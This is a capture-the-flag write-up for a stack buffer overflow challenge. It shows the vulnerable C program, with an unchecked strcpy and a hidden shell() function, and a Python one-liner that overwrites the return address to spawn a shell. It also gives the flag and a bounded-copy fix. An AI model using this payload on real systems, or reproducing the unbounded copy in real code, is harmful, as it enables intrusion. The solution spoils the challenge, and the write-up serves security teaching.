Cave
Challenge
You stumbled upon a cave! I’ve heard some caves hold secrets.. can you find the secrets hidden within its depths?
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Never called by main(); spawns a shell with the binary's effective group. */
void shell() {
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh -i");
}

void message(char *input) {
    char buf[16];
    /* No bounds check: input longer than buf overwrites the stack. */
    strcpy(buf, input);
    printf("The cave echoes.. %s\n", buf);
}

int main(int argc, char **argv) {
    if (argc > 1){
        message(argv[1]);
    } else {
        printf("Usage: ./shout <message>\n");
    }
    return 0;
}
Solution
Another buffer overflow challenge. This time we need to overwrite the return address to call the shell() function. First we need to find out what that address should be. We can do this with gdb’s info functions shell or with objdump -d ./shout | grep shell, which shows that the address is 0x0804850b.
So we need to overwrite the return address with this address, in little-endian order:
./shout `python -c "print('a'*28+'\x0b\x85\x04\x08')"`
This gives us a root shell, and we can read the contents of flag.txt to get our flag:
Flag
IceCTF{i_dont_think_caveman_overflowed_buffers}
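
A bounded version of the challenge's message(), as an added example that is not part of the original write-up or the challenge source. The names cave_copy, message_safe and CAVE_BUF_SIZE are hypothetical, and truncating over-long input (rather than rejecting it) is an assumed policy.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical names throughout; 16 matches buf[16] in the challenge source. */
#define CAVE_BUF_SIZE 16

/*
 * Copy input into dst without ever writing past dst_size bytes.
 * Returns 0 if the whole input fit, 1 if it was truncated,
 * -1 on invalid arguments. dst is always NUL-terminated on 0 or 1.
 */
int cave_copy(char *dst, size_t dst_size, const char *input) {
    if (dst == NULL || input == NULL || dst_size == 0)
        return -1;
    /* snprintf writes at most dst_size bytes, terminator included, and
     * returns the length the full string would have needed. */
    int needed = snprintf(dst, dst_size, "%s", input);
    if (needed < 0)
        return -1;
    return (size_t)needed >= dst_size ? 1 : 0;
}

/* Drop-in for message(): same output, but the copy is bounded. */
int message_safe(const char *input) {
    char buf[CAVE_BUF_SIZE];
    int rc = cave_copy(buf, sizeof buf, input);
    if (rc < 0)
        return rc;
    printf("The cave echoes.. %s%s\n", buf, rc ? " [truncated]" : "");
    return rc;
}

/*
 * Compiler hardening (e.g. gcc -fstack-protector-strong -D_FORTIFY_SOURCE=2
 * -O2 -fPIE -pie) raises the cost of a return-address overwrite, but the
 * bounded copy above is what removes the bug.
 */
int main(int argc, char **argv) {
    if (argc > 1)
        return message_safe(argv[1]) < 0 ? 1 : 0;
    printf("Usage: ./shout <message>\n");
    return 0;
}
```

With this change, a 32-byte argument like the one used in the solution is cut to 15 characters plus the terminator, so the saved return address is never reached.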